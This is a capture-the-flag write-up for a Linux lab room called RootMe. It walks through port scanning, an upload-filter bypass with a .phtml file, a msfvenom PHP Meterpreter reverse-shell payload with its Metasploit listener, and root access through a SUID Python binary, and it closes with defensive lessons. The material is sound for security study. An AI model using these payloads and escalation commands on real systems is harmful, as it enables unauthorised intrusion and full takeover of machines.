RootMe Writeup

Overview

RootMe is an easy Linux room focused on insecure file upload exploitation and basic Linux privilege escalation. The attack path is straightforward: enumerate the web application, bypass the upload restriction with a PHP-parsed extension, gain code execution, and escalate via a misconfigured SUID Python binary.

Target Information

• Room: RootMe
• Target IP: 10.128.154.229
• Attacker IP (LHOST): 10.128.94.175
• Objective: Gain a reverse shell through file upload and escalate to root

Reconnaissance

Started with a full TCP scan to identify exposed services, then followed up with service detection on the relevant ports.

sudo nmap -sS -p- -T4 10.128.154.229 -vv
sudo nmap -sV -p 22,80 10.128.154.229

The scan revealed two open services:

• 22/tcp: OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
• 80/tcp: Apache httpd 2.4.29 (Ubuntu)

Web Enumeration

With only HTTP exposed, the next step was content discovery. Directory brute-forcing quickly identified the upload functionality and the location where files were stored after upload.

ffuf -w /usr/share/wordlists/dirb/common.txt -u http://10.128.154.229/FUZZ

Key findings:

• /panel - File upload page
• /uploads - Directory containing uploaded files

Initial Access

The upload panel applied only weak extension filtering. Standard .php files were blocked, but Apache still executed .phtml as PHP, which made the restriction easy to bypass.

Payload Generation

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.128.94.175 LPORT=4444 -f raw > shell.phtml

Listener Setup

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 10.128.94.175
set LPORT 4444
exploit

Exploitation

• Visited http://10.128.154.229/panel
• Uploaded shell.phtml
• Triggered the payload at http://10.128.154.229/uploads/shell.phtml

This resulted in a successful Meterpreter session on the target.

User Flag

After obtaining shell access, the user flag was located on the web server:

find / -type f -name user.txt 2>/dev/null
cat /var/www/user.txt

Privilege Escalation

While enumerating the host, checking the current user's shell history exposed the exact escalation path used previously on the system.

cat .bash_history

The history contained two especially useful commands:

find / -perm /4000
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

To verify the room's intended path, a direct SUID search was also performed:

find / -perm -u=s -type f 2>/dev/null

The unusual binary was /usr/bin/python. On a normal system, Python should not be SUID-root. That made it an immediate privilege escalation vector.

Root Shell

After dropping from Meterpreter into a standard shell, the SUID Python binary was abused to preserve elevated privileges:

/usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

This returned a root shell immediately.

Root Flag

With root access confirmed, the final flag was retrieved from the root directory.

whoami
cat /root/root.txt

Attack Chain Summary

• Scanning: Nmap service and port enumeration
• Enumeration: ffuf directory brute-forcing
• Initial Access: Insecure file upload with .phtml extension bypass
• Shell Handling: Meterpreter reverse shell through Metasploit
• Privilege Escalation: SUID abuse on /usr/bin/python
• Hint Source: Local .bash_history disclosure

Lessons Learned

• File upload restrictions based only on extension filtering are weak and easy to bypass
• Apache PHP handling can include alternative extensions such as .phtml
• Upload directories should never allow execution of server-side scripts
• SUID binaries must be reviewed regularly for unusual or dangerous entries
• Local shell history can expose credentials, commands, and privilege escalation paths
• Simple enumeration often uncovers the intended route in beginner rooms

Tools Used

• Nmap - Port scanning and service detection
• ffuf - Directory enumeration
• msfvenom - PHP Meterpreter payload generation
• Metasploit - Multi/handler listener and session management
• Linux shell utilities - File discovery and privilege escalation checks